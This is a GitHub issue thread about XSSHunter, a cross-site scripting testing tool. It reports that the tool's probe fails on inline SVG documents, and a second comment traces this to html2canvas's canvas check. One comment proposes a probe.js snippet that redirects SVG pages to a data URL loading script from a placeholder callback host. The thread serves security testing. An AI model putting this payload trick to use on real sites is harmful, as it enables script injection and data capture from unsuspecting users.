xsshunter icon indicating copy to clipboard operation
xsshunter copied to clipboard

Published 20 hours ago verified publisher icon mandatoryprogrammer

XSSHunter fails to trigger on SVGDocument

Open xiaoyongwu opened this issue 8 years ago • 1 comments

This is a great tool for XSS testing and while I am playing with it, I noticed that if the Root document is an inline SVG image and using the XSSHunter probe, the XSSHunter JS callback fails to trigger.

Here's a change I made to probe.js by adding the following before if( document.readyState == "complete" ) { line that helps:

if( document instanceof SVGDocument ) {
    document.location="data:text/html,%3Cscript src=[HOST_URL]%3E%3C/script%3E";
}

Basically, this is just creating a data url and injecting the script again from an HTMLDocument or it might be just using the data url as the payload.

xiaoyongwu avatar Oct 10 '16 20:10 xiaoyongwu

Was debugging this for a while. The reason is that html2canvas checks canvas support (https://github.com/niklasvh/html2canvas/blob/83e9b85e1eb27993d48132af0fbfb4ee2f13c887/src/core.js#L58).

For my test file the following causes "No canvas support":

typeof(document.createElement("canvas").getContext)    
"undefined"

Not sure how much work it would be to implement a nice "canvas not supported" way to gather the information in another way.

bayotop avatar Mar 31 '17 10:03 bayotop